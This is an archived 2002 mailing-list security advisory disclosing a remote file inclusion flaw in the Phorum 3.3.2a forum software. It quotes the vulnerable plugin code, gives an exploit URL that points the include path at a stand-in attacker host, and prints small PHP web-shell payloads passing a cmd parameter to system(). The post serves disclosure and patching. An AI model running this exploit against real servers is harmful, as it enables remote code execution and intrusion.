OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Markus Arndt (markus-arndtweb.de)
Date: Fri May 17 2002 - 13:26:40 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Target:
    Phorum 3.3.2a (prior versions?)

    Description:
    In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
    include external php scripts and execute arbitary code.

    Found by:
    Markus Arndt<markus-arndtweb.de>

    Vendor:
    http://www.phorum.org

    Notified Vendor:
    Yes, already fixed version available

    Details:

    After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
    I just snooped around a bit and found this file vulnerable for remote script inclusion:

    ./plugin/replace/plugin.php

    let's see some code:

            <?php
            include("$PHORUM[settings_dir]/replace.php");

            function mod_replace_read_body ($body) {
              global $pluginreplace;
              reset($pluginreplace);
              while(list($key,$val) = each($pluginreplace)) {
                $body = str_replace($key,$val,$body);
              }
              return $body;
            }

            $plugins["read_body"]["mod_replace"]="mod_replace_read_body";

            ?>

    Easy one..

    http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

    This one will get the file http://[evilhost]/replace.php and execute it.
    If [evilhost] has php enabled we could use this one as replace.php:

            <?
            echo("<?
            system(\"\$cmd\");
            ?>");
            ?>

    If it's not php-enabled simply:
            <?
            system("$cmd");
            ?>

    Markus Arndt<markus-arndtweb.de>
    http://skka.de
    ________________________________________________________________
    Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr!
    Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13